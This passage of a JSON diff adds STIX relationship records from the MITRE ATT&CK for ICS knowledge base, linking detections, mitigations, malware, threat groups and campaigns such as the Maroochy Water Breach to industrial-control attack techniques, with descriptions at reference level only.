"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c43fbdc0-4c1d-4ff8-9dd2-fd45199dcfaa", + "created": "2022-09-27T16:35:12.372Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:47:35.207Z", + "description": "Monitor for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--39b9db72-8b48-4595-a18d-db5bbba3091b", + "target_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--d6a2a1a8-8f5b-4e94-8fce-8edd8a17627a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.209Z", + "relationship_type": "mitigates", + "description": "When available utilize hardware and software root-of-trust to verify the authenticity of a system. 
This may be achieved through cryptographic means, such as digital signatures or hashes, of critical software and firmware throughout the supply chain.\n", + "source_ref": "course-of-action--71eb7dad-07eb-4bbc-9df0-ac57bf2fba4a", + "target_ref": "attack-pattern--5e0f75da-e108-4688-a6de-a4f07cc2cbe3", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--c67e3535-69a9-4234-8170-4ad6efc632b7", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.211Z", + "relationship_type": "mitigates", + "description": "Implement continuous monitoring of vulnerability sources. Also, use automatic and manual code review tools. (Citation: OWASP)\n", + "source_ref": "course-of-action--de0bc375-50e1-4e26-a342-a8ff8c9d3037", + "target_ref": "attack-pattern--5e0f75da-e108-4688-a6de-a4f07cc2cbe3", + "external_references": [ + { + "source_name": "OWASP", + "description": "OWASP Top 10 Web Application Security Risks Retrieved. 2020/09/25 ", + "url": "https://owasp.org/www-project-top-ten/" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--61668e93-6d9d-418d-9fbd-2d88c3a66544", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.199Z", + "relationship_type": "mitigates", + "description": "Segment operational assets and their management devices based on their functional role within the process. 
Enabling more strict isolation to more critical control and operational information within the control environment. (Citation: Karen Scarfone; Paul Hoffman September 2009) (Citation: Keith Stouffer May 2015) (Citation: Department of Homeland Security September 2016) (Citation: Dwight Anderson 2014) \n", + "source_ref": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "target_ref": "attack-pattern--b14395bd-5419-4ef4-9bd8-696936f509bb", + "external_references": [ + { + "source_name": "Karen Scarfone; Paul Hoffman September 2009", + "description": "Karen Scarfone; Paul Hoffman 2009, September Guidelines on Firewalls and Firewall Policy Retrieved. 2020/09/25 ", + "url": "https://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-41r1.pdf" + }, + { + "source_name": "Keith Stouffer May 2015", + "description": "Keith Stouffer 2015, May Guide to Industrial Control Systems (ICS) Security Retrieved. 2018/03/28 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf" + }, + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + }, + { + "source_name": "Dwight Anderson 2014", + "description": "Dwight Anderson 2014 Protect Critical Infrastructure Systems With Whitelisting Retrieved. 
2020/09/25 ", + "url": "https://www.sans.org/reading-room/whitepapers/ICS/protect-critical-infrastructure-systems-whitelisting-35312" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--21041206-da58-45c7-adb0-db07caebdcb6", + "created": "2021-04-13T12:36:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke March 2016", + "description": "Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke 2016, March 31 Plc-blaster: A worm living solely in the plc. Retrieved. 2017/09/19 ", + "url": "https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC-wp.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:00:27.700Z", + "description": "[PLC-Blaster](https://attack.mitre.org/software/S1006) uses the system function blocks TCON and TDISCON to initiate and destroy TCP connections to arbitrary systems. Buffers may be sent and received on these connections with TRCV und TSEND system function blocks. 
(Citation: Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke March 2016)", + "relationship_type": "uses", + "source_ref": "malware--4dcff507-5af8-47ce-964a-8d9569e9ccfe", + "target_ref": "attack-pattern--b52870cc-83f3-473c-b895-72d91751030b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--2089201c-c1c6-4d92-a737-a6499e26ee7f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.094Z", + "relationship_type": "mitigates", + "description": "Provide operators with redundant, out-of-band communication to support monitoring and control of the operational processes, especially when recovering from a network outage (Citation: National Institute of Standards and Technology April 2013). Out-of-band communication should utilize diverse systems and technologies to minimize common failure modes and vulnerabilities within the communications infrastructure. For example, wireless networks (e.g., 3G, 4G) can be used to provide diverse and redundant delivery of data.\n", + "source_ref": "course-of-action--b11cad63-ef30-4eb8-af0d-6cc46eef3f3e", + "target_ref": "attack-pattern--e33c7ecc-5a38-497f-beb2-a9a2049a4c20", + "external_references": [ + { + "source_name": "National Institute of Standards and Technology April 2013", + "description": "National Institute of Standards and Technology 2013, April Security and Privacy Controls for Federal Information Systems and Organizations Retrieved. 
2020/09/17 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r4.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--f2e6103d-ca06-45c4-8fe9-049687fc4361", + "created": "2022-05-11T16:22:58.803Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T15:38:17.130Z", + "description": "Monitor for loss of expected operational process alarms which could indicate alarms are being suppressed. As noted in the technique description, there may be multiple sources of alarms in an ICS environment. Discrepancies between alarms may indicate the adversary is suppressing some but not all the alarms in the environment. This will not directly detect the technique’s execution, but instead may provide additional evidence that the technique has been used and may complement other detections.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--4c12c1c8-bcef-4daf-8e5b-fca235f71d9e", + "target_ref": "attack-pattern--2900bbd8-308a-4274-b074-5b8bde8347bc", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--a1383f2a-2ee2-47df-a661-8904a7535e0c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.233Z", + "relationship_type": "mitigates", + "description": "Applications and appliances that utilize default username and password should be changed 
immediately after the installation, and before deployment to a production environment. (Citation: CISA June 2013)\n", + "source_ref": "course-of-action--5d97c693-e054-48ba-a3a3-eaf6942dfb65", + "target_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "external_references": [ + { + "source_name": "CISA June 2013", + "description": "CISA 2013, June Risks of Default Passwords on the Internet Retrieved. 2020/09/25 ", + "url": "https://us-cert.cisa.gov/ncas/alerts/TA13-175A" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--ae7487f1-a2d0-443d-b418-cd726c5ac15f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.167Z", + "relationship_type": "mitigates", + "description": "Network connection enumeration is likely obtained by using common system tools (e.g., netstat, ipconfig).\n", + "source_ref": "course-of-action--469b78dd-a54d-4f7c-8c3b-4a1dd916b433", + "target_ref": "attack-pattern--ea0c980c-5cf0-43a7-a049-59c4c207566e", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--3f76d408-be8a-478e-8a5a-aab1d1f96572", + "created": "2018-04-18T17:59:24.739Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Julian Rrushi, Hassan Farhangi, Clay Howey, Kelly Carmichael, Joey Dabell December 2015", + "url": "https://pdfs.semanticscholar.org/18df/43ef1690b0fae15a36f770001160aefbc6c5.pdf", + "description": "Julian Rrushi, Hassan Farhangi, Clay Howey, 
Kelly Carmichael, Joey Dabell 2015, December 08 A Quantitative Evaluation of the Target Selection of Havex ICS Malware Plugin Retrieved. 2019/04/01 " + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "The [Backdoor.Oldrea](https://attack.mitre.org/software/S0093) ICS malware plugin relies on Windows networking (WNet) to discover all the servers, including OPC servers, that are reachable by the compromised machine over the network. (Citation: Julian Rrushi, Hassan Farhangi, Clay Howey, Kelly Carmichael, Joey Dabell December 2015)", + "modified": "2022-08-11T13:23:12.321Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--083bb47b-02c8-4423-81a2-f9ef58572974", + "target_ref": "attack-pattern--d5a69cfb-fc2a-46cb-99eb-74b236db5061", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--adf2072c-0341-4fc2-9d25-495b4af864e9", + "created": "2023-03-10T20:09:22.370Z", + "revoked": false, + "external_references": [ + { + "source_name": "Marshall Abrams July 2008", + "description": "Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 
2018/03/27 ", + "url": "https://www.mitre.org/sites/default/files/pdf/08_1145.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-10T20:09:22.370Z", + "description": "In the [Maroochy Water Breach](https://attack.mitre.org/campaigns/C0020), the adversary temporarily shut an investigator out of the network preventing them from issuing any controls.(Citation: Marshall Abrams July 2008)", + "relationship_type": "uses", + "source_ref": "campaign--70cab19e-1745-425e-b3db-c02cd5ff157a", + "target_ref": "attack-pattern--e33c7ecc-5a38-497f-beb2-a9a2049a4c20", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--86f1655a-db46-4d49-9051-6653da83eb13", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Keith Stouffer May 2015", + "description": "Keith Stouffer 2015, May Guide to Industrial Control Systems (ICS) Security Retrieved. 2018/03/28 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf" + }, + { + "source_name": "National Institute of Standards and Technology April 2013", + "description": "National Institute of Standards and Technology 2013, April Security and Privacy Controls for Federal Information Systems and Organizations Retrieved. 
2020/09/17 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r4.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-30T19:13:57.066Z", + "description": "Protect files with proper permissions to limit opportunities for adversaries to interact and collect information from databases. (Citation: Keith Stouffer May 2015) (Citation: National Institute of Standards and Technology April 2013)\n", + "relationship_type": "mitigates", + "source_ref": "course-of-action--f9fcb3ec-6de0-4559-8cd9-ef1c0c7d1971", + "target_ref": "attack-pattern--3405891b-16aa-4bd7-bd7c-733501f9b20f", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b47dbc50-fd8f-4e5b-bb3d-e93b68bf5497", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-21T14:34:42.612Z", + "description": "Limit access to network infrastructure and resources that can be used to reshape traffic or otherwise produce AiTM conditions.\n", + "relationship_type": "mitigates", + "source_ref": "course-of-action--bcf91ebc-f316-4e19-b2f6-444e9940c697", + "target_ref": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--edb32a4d-62a3-467c-8dfa-f97f1bcbffc6", + "created": "2022-09-27T16:56:30.665Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + 
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:39:41.897Z", + "description": "Monitor for newly constructed scheduled jobs that may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--f42df6f0-6395-4f0c-9376-525a031f00c3", + "target_ref": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a82e9f8a-f81e-407a-b284-e0ae5f055c61", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:39:30.850Z", + "description": "Monitor for changes made to a file may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--84572de3-9583-4c73-aabd-06ea88123dd8", + "target_ref": "attack-pattern--53a26eee-1080-4d17-9762-2027d5a1b805", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--7d6c4a00-acde-40af-bf91-a4ef009cf135", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-08T22:29:53.545Z", + "description": "Devices that allow remote management of 
firmware should require authentication before allowing any changes. The authentication mechanisms should also support [Account Use Policies](https://attack.mitre.org/mitigations/M0936), [Password Policies](https://attack.mitre.org/mitigations/M0927), and [User Account Management](https://attack.mitre.org/mitigations/M0918).", + "relationship_type": "mitigates", + "source_ref": "course-of-action--66cfe23e-34b6-4583-b178-ed6a412db2b0", + "target_ref": "attack-pattern--efbf7888-f61b-4572-9c80-7e2965c60707", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e4a11381-8608-4c71-966f-df0cbb834fe0", + "created": "2022-09-30T15:35:09.660Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:51:08.392Z", + "description": "Monitor for new ICS protocol connections to existing assets or for device scanning (i.e., a host connecting to many devices) over ICS and enterprise protocols (e.g., ICMP, DCOM, WinRM). 
For added context on adversary enterprise procedures and background see [Remote System Discovery](https://attack.mitre.org/techniques/T1018).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "target_ref": "attack-pattern--d5a69cfb-fc2a-46cb-99eb-74b236db5061", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--2daeeaaa-5b4b-4bb7-a94d-78a5749027ca", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.126Z", + "relationship_type": "mitigates", + "description": "Limit access to remote services through centrally managed concentrators such as VPNs and other managed remote access systems.\n", + "source_ref": "course-of-action--49b306c1-a046-42c5-a4d2-30f264ada110", + "target_ref": "attack-pattern--8d2f3bab-507c-4424-b58b-edc977bd215c", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--245c8c36-28e5-4508-a585-7768cb33299a", + "created": "2023-03-10T20:06:10.209Z", + "revoked": false, + "external_references": [ + { + "source_name": "Marshall Abrams July 2008", + "description": "Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 
2018/03/27 ", + "url": "https://www.mitre.org/sites/default/files/pdf/08_1145.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-10T20:06:10.209Z", + "description": "In the [Maroochy Water Breach](https://attack.mitre.org/campaigns/C0020), the adversary gained remote computer access to the system over radio.(Citation: Marshall Abrams July 2008)", + "relationship_type": "uses", + "source_ref": "campaign--70cab19e-1745-425e-b3db-c02cd5ff157a", + "target_ref": "attack-pattern--8d2f3bab-507c-4424-b58b-edc977bd215c", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--eeeaa0d4-0ca0-468e-ae13-43ab7aba61b4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.231Z", + "relationship_type": "mitigates", + "description": "Consider configuration and use of a network-wide authentication service such as Active Directory, LDAP, or RADIUS capabilities which can be found in ICS devices. (Citation: Keith Stouffer May 2015) (Citation: Schweitzer Engineering Laboratories August 2015)\n", + "source_ref": "course-of-action--2f0160b7-e982-49d7-9612-f19b810f1722", + "target_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "external_references": [ + { + "source_name": "Keith Stouffer May 2015", + "description": "Keith Stouffer 2015, May Guide to Industrial Control Systems (ICS) Security Retrieved. 
2018/03/28 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf" + }, + { + "source_name": "Schweitzer Engineering Laboratories August 2015", + "description": "Schweitzer Engineering Laboratories 2015, August Understanding When to Use LDAP or RADIUS for Centralized Authentication Retrieved. 2020/09/25 ", + "url": "https://cdn.selinc.com/assets/Literature/Publications/Application%20Notes/AN2015-08_20150817.pdf?" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--7e87ce08-a428-4e55-876e-80d2760121a5", + "created": "2022-05-11T16:22:58.803Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:37:35.099Z", + "description": "Monitor executed commands and arguments for actions that could be taken to collect internal data.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0", + "target_ref": "attack-pattern--3de230d4-3e42-4041-b089-17e1128feded", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--f65a8ce8-90fa-4d92-a0dc-3ee544c541fe", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Dragos", + "description": "Dragos Chrysene Retrieved. 
2019/10/27 ", + "url": "https://dragos.com/resource/chrysene/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T16:32:49.409Z", + "description": "[OilRig](https://attack.mitre.org/groups/G0049) utilized stolen credentials to gain access to victim machines.(Citation: Dragos)", + "relationship_type": "uses", + "source_ref": "intrusion-set--4ca1929c-7d64-4aab-b849-badbfc0c760d", + "target_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--74b66248-2cb6-46ea-b52c-c7d60c170f3f", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "MDudek-ICS", + "description": "MDudek-ICS TRISIS-TRITON-HATMAN Retrieved. 2019/11/03 ", + "url": "https://github.com/MDudek-ICS/TRISIS-TRITON-HATMAN/tree/master/decompiled_code/library" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:26:26.552Z", + "description": "[Triton](https://attack.mitre.org/software/S1009) has the ability to halt or run a program through the TriStation protocol. TsHi.py contains instances of halt and run functions being executed. 
(Citation: MDudek-ICS)", + "relationship_type": "uses", + "source_ref": "malware--80099a91-4c86-4bea-9ccb-dac55d61960e", + "target_ref": "attack-pattern--2883c520-7957-46ca-89bd-dab1ad53b601", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--42ab7d24-8286-4a7a-8cd7-02e54a80e13f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.185Z", + "relationship_type": "mitigates", + "description": "Ensure permissions restrict project file access to only engineer and technician user groups and accounts.\n", + "source_ref": "course-of-action--f9fcb3ec-6de0-4559-8cd9-ef1c0c7d1971", + "target_ref": "attack-pattern--e72425f8-9ae6-41d3-bfdb-e1b865e60722", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--d2addaa7-0fdf-44e3-9b20-c63b2b4179af", + "created": "2022-09-27T16:08:15.473Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T16:08:15.473Z", + "description": "Monitor device application logs that indicate the program has changed, although not all devices produce such logs.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--fc5fda7e-6b2c-4457-b036-759896a2efa2", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": 
"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e18af08c-3953-4b1d-b46c-45572fdb5187", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T19:02:08.013Z", + "description": "Monitor operational data for indicators of temporary data loss which may indicate a Denial of Service. This will not directly detect the technique’s execution, but instead may provide additional evidence that the technique has been used and may complement other detections.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--931b3fc6-ad68-42a8-9018-e98515eedc95", + "target_ref": "attack-pattern--1b22b676-9347-4c55-9a35-ef0dc653db5b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--520aad6a-2483-45bc-a172-2417137f6ca0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.143Z", + "relationship_type": "mitigates", + "description": "Utilize out-of-band communication to validate the integrity of data from the 